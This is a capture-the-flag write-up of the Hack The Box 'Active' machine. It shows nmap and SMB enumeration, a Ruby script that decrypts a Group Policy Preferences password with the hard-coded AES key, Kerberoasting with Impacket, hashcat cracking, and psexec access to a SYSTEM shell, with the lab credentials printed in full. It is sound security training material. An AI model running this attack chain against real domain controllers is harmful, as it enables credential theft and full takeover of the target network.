Active

Nmap reveals us that there's many ports open:

nmap -sC -sV -oA nmap/ -T4 10.129.153.112
# Nmap 7.93 scan initiated Wed Jan 11 19:17:50 2023 as: /snap/nmap/2864/usr/bin/nmap -sC -sV -oA nmap/ -T4 10.129.210.76
Nmap scan report for 10.129.210.76
Host is up (0.060s latency).
Not shown: 983 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-01-11 17:17:58Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-01-11T17:18:53
|_  start_date: 2023-01-11T17:15:46
| smb2-security-mode: 
|   210: 
|_    Message signing enabled and required

Based on ports 53 and 88 we are dealing with with Active Directory and most likely a domain controller! Let's start enumerating SMB with smbclient:

joonas@joonas-VirtualBox:~/Documents$ smbclient -L 10.129.210.76 -N

do_connect: Connection to 10.129.210.76 failed (Error NT_STATUS_HOST_UNREACHABLE)

joonas@joonas-VirtualBox:~/Documents$ smbclient -L 10.129.153.112 -N

Anonymous login successful

        Sharename       Type      Comment

        ---------       ----      -------

        ADMIN$          Disk      Remote Admin

        C$              Disk      Default share

        IPC$            IPC       Remote IPC

        NETLOGON        Disk      Logon server share 

        Replication     Disk      

        SYSVOL          Disk      Logon server share 

        Users           Disk      

SMB1 disabled -- no workgroup available

Nice, anonymous login is allowed and we get list of shares. We have no access to most of the shares but luckily Replication is open for everyone. Let's check what's in there with smbclient:

smbclient  \\\\10.129.153.112\\Replication -N
Anonymous login successful

Try "help" to get a list of possible commands.

smb: \> ls

  .                                   D        0  Sat Jul 21 13:37:44 2018

  ..                                  D        0  Sat Jul 21 13:37:44 2018

  active.htb                          D        0  Sat Jul 21 13:37:44 2018

                5217023 blocks of size 4096. 260059 blocks available

There seems to be one directory, let's download it to our local machine to inspect it more closely. Before we do that, let's set prompt off and recurse on to download files a bit faster:

smb: \> prompt off                                                              smb: \> recurse on                                                              

smb: \> mget *                                                                  getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)                               getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI

 of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.IN

I (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
....

After downloading the files and checking them out there's one file that's interesting: Groups.xml. It contains username and a hashed password:

groupsxml

Apparently this is/was a real thing on Windows according to this article. Windows stored some passwords on Groups.xml file under SYSVOL-folder.

Anyway, let's decrypt the password. For this we will be using this script: (taken from here but modified slightly)

require 'rubygems'

require 'openssl'

require 'base64'

def decrypt(encrypted_data)

  padding = "=" * (4 - (encrypted_data.length % 4))

  epassword = "#{encrypted_data}#{padding}"

  decoded = Base64.decode64(epassword)

  key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"

  aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC")

  aes.decrypt

  aes.key = key

  plaintext = aes.update(decoded)

  plaintext << aes.final

  pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion

  return pass

end

blah = decrypt(ARGV[0])

puts blah

Save the script as gpp-decrypt.rb and let's run it with ruby:

ruby gpp-decrypt.rb edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

And we get the password: 'GPPstillStandingStrong2k18'

These credentials give us nothing new at first glance, we can't even login to the machine with psexec. One thing we could do is try Kerberoasting using Impacket:

GetUserSPNs.py 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip 10.129.153.112 -request

And what do you know we get Administrators hash:

joonas@joonas-VirtualBox:~$ GetUserSPNs.py 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip 10.129.153.112 -request

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 

--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------

active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 22:06:40.351723  2023-01-16 18:31:01.030538             

[-] CCache file is not found. Skipping...

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$9ec0ef6cd7f27876772b33bf18d13ff2$6948732caab053117e7d3a5ddad9c18303a6eae54eee979c8f09c91cb7c404a27687c0b62261b12fede076535fba669aa84bc4e717848d58f683e1e82618c0faf7a7a751fd639c2fcd82d01bcd3fe830260e3f6c79ddf08a391ec6d638463f83f951f823fd4ef278123baed42ecb0ff6ab0f439ca3efa43ac9ee0038b51555e136a6b8af3faf80ba5a12dfa394b0b653eabca4b8db288e103b2f404d885587754422f147ee92a0b6d59e64e53c4d090adc1e4accd3aed45c8e7b0f11beed8fb858462dedd63e137a1b49f40c458472f29e1c7d1158c67341900a109ed98b2c59f7b33f1802130ded3f2d3ecb735a0cc4df9895deac4c0af069f50744c3ca065ce6abf6e7f4ae9fd64b79f1d760053a2d3d4433e3ca7a68eead59148ba176df8fff03208ca6c080ae0d0a2590060592114f7f79329712065ec634ef1dc7a667045bb4b7dabad325f02ce0c3a4037436deb3e09b2017d1283fca6a38313e84e6510faf7db53c9cb7c18ce358092abb7e6f72d95922e2c7e479ab1390e602ab3ac8bd0d44fed0d6bd618d56f22a41be561aa4ff0da4e5ba365b31b04f514be6ed89a73ce0c51dd7902cf50afc1c4e73ea4b7d534e6dfcd87369bebf74cb0eb748f8da89a0ff14fa8569b03468d33496c102645e9a681f89a76d0c627bf2d098812db6fc8e0006d60bae7427d1efdb9530249c2e9541abf8bc439fe43e7432e118fc587acc02a368f40a9ba241898f4c3ba64a19c928e22a9a51b30da165bc7d9aaa6798a6e817aa76ce4c0b14f1b17c3f2ac249c292718c3d99c0abb8e1caeaf3e5c4274c498dca2e052ebfc63e268be04b7ceb6238c921b7ae0c2f7165c7b8ebaa167af68b519f92a12ac54d029b4be6235ac9ec65b6d34bb94e8398c5ee80c5577512311cc4adb7040e56f2e7e019381130fc9ef843b8bba4b0753e983fb7a7e805056a31fed90cfb5f7d101f75782b7b8dcf6058bcda4ce4aeb41a46a17bf3b2eeafbdeedb24e20d1139f564cfe870a24392dcaf69c7dc008b0206a350cf9f068615e10f63a740117302662839600dad7e422a7837bf00f428b1b09bf26ccb2ef28066057a17a115b8c61358b9325ee14b9d834e4b103cc331de5eee41d6169bf2f793cb0b645c9573bc78de98312a267aea7c59d2f0e98da59dbb3e2ce09db420b4d617721af6c4d9e0a46f2f4fbe4251d31a347ed51fd77fa8022f7a878181399fd9ae692092d3f809e2e9df963e79aca19bd0e993e13ff29d

This can be cracked via hashcat, store the hash in file hash.txt and run:

.\hashcat.exe .\hash.txt .\rockyou.txt

The password is 'Ticketmaster1968'. With these credentials we can login to the box via psexec:

psexec.py active.htb/administrator:Ticketmaster1968@10.129.153.112

And we are admin!

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.129.153.112.....

[*] Found writable share ADMIN$

[*] Uploading file nppuIMaU.exe

[*] Opening SVCManager on 10.129.153.112.....

[*] Creating service Coao on 10.129.153.112.....

[*] Starting service Coao.....

[!] Press help for extra shell commands

Microsoft Windows [Version 6.1.7601]

Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami

nt authority\system